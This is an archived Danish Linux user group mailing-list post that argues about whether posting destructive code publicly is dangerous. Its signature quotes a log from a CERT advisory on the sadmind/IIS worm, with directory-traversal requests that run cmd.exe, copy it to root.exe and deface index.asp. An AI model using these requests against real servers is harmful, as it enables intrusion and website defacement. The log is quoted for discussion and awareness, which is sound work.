[an error occurred while processing this directive] [an error occurred while processing this directive][an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive] (none) [an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive][an error occurred while processing this directive] [an error occurred while processing this directive][an error occurred while processing this directive] [an error occurred while processing this directive][an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive] (none) [an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive][an error occurred while processing this directive]
 
[an error occurred while processing this directive] [an error occurred while processing this directive]
Skåne Sjælland Linux User Group - http://www.sslug.dk Home   Subscribe   Mail Archive   Forum   Calendar   Search
MhonArc Date: [Date Prev] [Date Index] [Date Next]   Thread: [Date Prev] [Thread Index] [Date Next]   MhonArc
 

Re: [MISC] Virus bon appetit (var [MISC] Ftp software )



Martin Bøgelund wrote:
> Jeg har ret til at være uvidende, mentalt retarderet, beruset, og
> psykisk ustabil. Det omkringliggende samfund må tage sine
> forholdsregler for at undgå at jeg kommer i besiddelse af effekter
> hvormed jeg kan skade mig selv og andre.

Det har du ret til, men du kan ikke forvente at det omkringliggende
samfund skal tage særlig hensyn til dig. Ellers ville halvdelen af
den danske befolkning jo være sat i bevaring i gummiceller for at
beskytte dem mod sig selv, ikke mindst dem der tilhører mindretals
partierne på yderfløjene. Folk må være voksne nok til at tage ansvar
for deres egne handlinger, også når resultatet skyldes deres egen
dumhed.

> At dumpe destruktiv kode på SSLUG-listen, der jo
> er offentligt tilgængelig, er ikke en sådan forholdsregel.

destruktiv?

Jeg har lige læst  CERT® Advisory CA-2001-11 sadmind/IIS Worm
(http://www.cert.org/advisories/CA-2001-11.html), i det dokument
står der (jeg har skrevet det i min signature for mordskabsskyld)

Ovenstående link er offentlig tilgængelig, og min signature burde
give en cracker en ganske god idee for hvordan en IIS server kan
defaces. Desværre har jeg ikke en NT IIS server at prøve den på,
måske kræves det et bufferoverflow angreb for at pille ved nogle
rettigheder så cmd.exe kan køres? Ellers er der en gigantisk 
bagdør på alle IIS servere.

> Det findes der jo hverken piller eller love imod, og derudover kan
> vi være så godt som sikre på at destruktiv kode før eller siden vil
> pasere en person der ikke burde have adgang til hverken koden,
> Internettet, eller computere.
Get Real!

Script kiddies behøver ikke Jakob's signature. Og de kender
formodeligt allerede i forvejen indeholdet af min signature.

-- 
Sample Log from Attacked IIS Server
.. GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
.. GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
.. GET /scripts/../../winnt/system32/cmd.exe          
/c+copy+\winnt\system32\cmd.exe+root.exe 502 -
.. GET /scripts/root.exe /c+echo+<HTML code inserted here>.././index.asp
502 -



 
Home   Subscribe   Mail Archive   Index   Calendar   Search

 
 
Questions about the web-pages to <www_admin>. Last modified 2005-08-10, 19:23 CEST [an error occurred while processing this directive]
This page is maintained by [an error occurred while processing this directive]MHonArc [an error occurred while processing this directive] # [an error occurred while processing this directive] *